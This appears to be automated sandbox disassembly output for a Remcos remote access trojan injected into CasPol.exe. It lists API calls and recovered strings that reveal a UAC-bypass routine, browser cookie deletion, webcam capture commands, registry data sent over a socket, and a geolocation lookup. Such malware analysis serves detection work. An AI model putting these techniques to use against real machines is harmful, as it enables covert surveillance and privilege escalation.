                                                                                                            • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                            • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                            • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • _free.LIBCMT ref: 00444086
                                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID: J7D
                                                                                                            • API String ID: 3033488037-1677391033
                                                                                                            • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                            • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: HE$HE
                                                                                                            • API String ID: 269201875-1978648262
                                                                                                            • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                            • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                            • API String ID: 3114080316-344394840
                                                                                                            • Opcode ID: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                            • Opcode Fuzzy Hash: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                            • Opcode ID: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                            • Opcode Fuzzy Hash: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                            • Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: P[G
                                                                                                            • API String ID: 2536120697-571123470
                                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                            Strings
                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                            • API String ID: 3121278467-91888290
                                                                                                            • Opcode ID: 98fb14b2ac9156131480318ad0ac9b4491288a63bb14312046f8df13302c680a
                                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                            • Opcode Fuzzy Hash: 98fb14b2ac9156131480318ad0ac9b4491288a63bb14312046f8df13302c680a
                                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                            • API String ID: 3851391207-2637227304
                                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: H]G
                                                                                                            • API String ID: 2536120697-1717957184
                                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                            Strings
                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                            • API String ID: 2018770650-304995407
                                                                                                            • Opcode ID: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                            • Opcode Fuzzy Hash: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                            APIs
                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                            • API String ID: 2425139147-2527699604
                                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                            • API String ID: 0-3292752334
                                                                                                            • Opcode ID: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                            • Opcode Fuzzy Hash: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                            • String ID: Alarm triggered$`#v
                                                                                                            • API String ID: 614609389-3049340936
                                                                                                            • Opcode ID: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                            • Opcode Fuzzy Hash: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                            • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe
                                                                                                            • String ID:
                                                                                                            • API String ID: 4189289331-0
                                                                                                            • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                            • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                            • Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                            • Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologSleep
                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                            • API String ID: 3469354165-462540288
                                                                                                            • Opcode ID: fea753129d67a911db83ec9719f0726e8be355b30250b39268ef61c21add15eb
                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                            • Opcode Fuzzy Hash: fea753129d67a911db83ec9719f0726e8be355b30250b39268ef61c21add15eb
                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                            APIs
